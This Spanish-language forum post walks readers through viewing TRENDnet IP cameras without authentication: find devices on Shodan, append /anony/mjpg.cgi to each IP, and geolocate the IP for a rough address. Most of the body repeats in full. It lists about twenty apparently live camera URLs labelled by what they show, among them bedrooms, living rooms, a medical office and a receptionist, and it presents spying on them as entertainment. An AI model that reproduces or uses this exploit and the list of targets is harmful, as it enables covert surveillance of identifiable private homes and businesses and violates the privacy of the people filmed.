Estimados taringueros, les dejo una pequeña guía para saltar la seguridad de algunas cámaras IP que andan dando vueltas por ahí.
Primero aclaro que esto no es un descubrimiento mio ni mucho menos, y que no me creo hacker ni nada parecido por esta pavada. Pero me resulto, útil, curioso y un tanto divertido y por eso lo comparto.
El post original con el descubrimiento y la explicación completa (en inglés) es este: http://console-cowboys.blogspot.com/2012/01/trendnet-cameras-i-always-feel-like.html
Primero aclarar que esto solo sirve para estas cámaras de Trendnet:
http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W
Bueno, la explicación:
1) Buscar cámaras que estén en Internet:
En primer lugar ingresamos a http://www.shodanhq.com/ y en el buscador escribimos "netcam". Da lo mismo si usamos comillas o no.
Aquí encontraremos todas las cámaras que este sitio pudo "esnifear" con su correspondiente identificación. No todas son las cámaras vulnerables. El primer filtro a tener en cuenta es que no sirven las que aparecen como "Netcam", es decir con la "N" en mayúsculas. Solo las que aparecen como "netcam".
El sitio nos permite filtrar por país la búsqueda. Para hacerlo escribimos en el buscador lo siguiente:
netcam country:Código de país
El código de país es el asignado por la IANA y pueden consultarse acá: http://es.wikipedia.org/wiki/Categor%C3%ADa:Dominios_de_Internet_por_pa%C3%ADs.
Así, por ejemplo, si queremos buscar cámaras de Argentina deberíamos escribir en el buscador:
netcam country:AR
2) Visitar las cámaras:
Para ver cada una de las cámaras encontradas (en caso de que estén activas, transmitiendo y sean realmente el modelo afectado por esta vulnerabilidad) debemos copiar al IP que nos da el sitio shodanhq en nuestro navegador y agregarle la extensión: /anony/mjpg.cgi.
Así, por ejemplo, la URL para acceder a una cámara sería:
http://190.190.17.43/anony/mjpg.cgi
Si se registran en el sitio Shodanhq pueden acceder a más resultados, y si pagan a todavía muchos más. Pero con los que trae inicialmente hay para divertirse un rato.
Les dejo algunas de las cámaras que yo encontré "trabajando" :
http://69.245.82.113/anony/mjpg.cgi Cama
http://109.189.232.87/anony/mjpg.cgi Living
http://74.77.194.152/anony/mjpg.cgi Calle
http://65.182.79.56/anony/mjpg.cgi Recepcion
http://66.25.25.182/anony/mjpg.cgi Otra cama
http://152.14.56.160/anony/mjpg.cgi Depósito/Sala de máquinas
http://67.33.52.88/anony/mjpg.cgi Estacionamiento
http://99.169.70.179/anony/mjpg.cgi Living
http://72.214.3.171/anony/mjpg.cgi Recepción (con secretaria)
http://190.92.17.124/anony/mjpg.cgi Oficina chiquita
http://69.198.183.90/anony/mjpg.cgi Consultorio
http://75.38.134.11/anony/mjpg.cgi Comedor antiguo
http://67.180.241.51/anony/mjpg.cgi Pecera copada
http://173.14.102.131/anony/mjpg.cgi Callcenter
http://76.175.108.140/anony/mjpg.cgi Living departamento
http://187.142.125.94/anony/mjpg.cgi Venta de celulares en Mexico
http://190.190.17.43/anony/mjpg.cgi PH Argento (Lanus)
http://200.120.141.238/anony/mjpg.cgi Tienda de deportes en Chile
http://200.32.183.116/anony/mjpg.cgi Comercio en Chile
http://200.32.183.124/anony/mjpg.cgi Mostrador/comercio en Chile
Dato curioso:
Si quieren saber a que dirección aproximada pertenece la IP de alguna de las cámaras pueden ingresar a http://www.ipaddresslocation.org/ e ingresar la IP de la cámara en dónde dice "Track IP":
Primero aclaro que esto no es un descubrimiento mio ni mucho menos, y que no me creo hacker ni nada parecido por esta pavada. Pero me resulto, útil, curioso y un tanto divertido y por eso lo comparto.
El post original con el descubrimiento y la explicación completa (en inglés) es este: http://console-cowboys.blogspot.com/2012/01/trendnet-cameras-i-always-feel-like.html
Primero aclarar que esto solo sirve para estas cámaras de Trendnet:
http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W
Bueno, la explicación:
1) Buscar cámaras que estén en Internet:
En primer lugar ingresamos a http://www.shodanhq.com/ y en el buscador escribimos "netcam". Da lo mismo si usamos comillas o no.
Aquí encontraremos todas las cámaras que este sitio pudo "esnifear" con su correspondiente identificación. No todas son las cámaras vulnerables. El primer filtro a tener en cuenta es que no sirven las que aparecen como "Netcam", es decir con la "N" en mayúsculas. Solo las que aparecen como "netcam".
El sitio nos permite filtrar por país la búsqueda. Para hacerlo escribimos en el buscador lo siguiente:
netcam country:Código de país
El código de país es el asignado por la IANA y pueden consultarse acá: http://es.wikipedia.org/wiki/Categor%C3%ADa:Dominios_de_Internet_por_pa%C3%ADs.
Así, por ejemplo, si queremos buscar cámaras de Argentina deberíamos escribir en el buscador:
netcam country:AR
2) Visitar las cámaras:
Para ver cada una de las cámaras encontradas (en caso de que estén activas, transmitiendo y sean realmente el modelo afectado por esta vulnerabilidad) debemos copiar al IP que nos da el sitio shodanhq en nuestro navegador y agregarle la extensión: /anony/mjpg.cgi.
Así, por ejemplo, la URL para acceder a una cámara sería:
http://190.190.17.43/anony/mjpg.cgi
Si se registran en el sitio Shodanhq pueden acceder a más resultados, y si pagan a todavía muchos más. Pero con los que trae inicialmente hay para divertirse un rato.
Les dejo algunas de las cámaras que yo encontré "trabajando" :
http://69.245.82.113/anony/mjpg.cgi Cama
http://109.189.232.87/anony/mjpg.cgi Living
http://74.77.194.152/anony/mjpg.cgi Calle
http://65.182.79.56/anony/mjpg.cgi Recepcion
http://66.25.25.182/anony/mjpg.cgi Otra cama
http://152.14.56.160/anony/mjpg.cgi Depósito/Sala de máquinas
http://67.33.52.88/anony/mjpg.cgi Estacionamiento
http://99.169.70.179/anony/mjpg.cgi Living
http://72.214.3.171/anony/mjpg.cgi Recepción (con secretaria)
http://190.92.17.124/anony/mjpg.cgi Oficina chiquita
http://69.198.183.90/anony/mjpg.cgi Consultorio
http://75.38.134.11/anony/mjpg.cgi Comedor antiguo
http://67.180.241.51/anony/mjpg.cgi Pecera copada
http://173.14.102.131/anony/mjpg.cgi Callcenter
http://76.175.108.140/anony/mjpg.cgi Living departamento
http://187.142.125.94/anony/mjpg.cgi Venta de celulares en Mexico
http://190.190.17.43/anony/mjpg.cgi PH Argento (Lanus)
http://200.120.141.238/anony/mjpg.cgi Tienda de deportes en Chile
http://200.32.183.116/anony/mjpg.cgi Comercio en Chile
http://200.32.183.124/anony/mjpg.cgi Mostrador/comercio en Chile
Dato curioso:
Si quieren saber a que dirección aproximada pertenece la IP de alguna de las cámaras pueden ingresar a http://www.ipaddresslocation.org/ e ingresar la IP de la cámara en dónde dice "Track IP":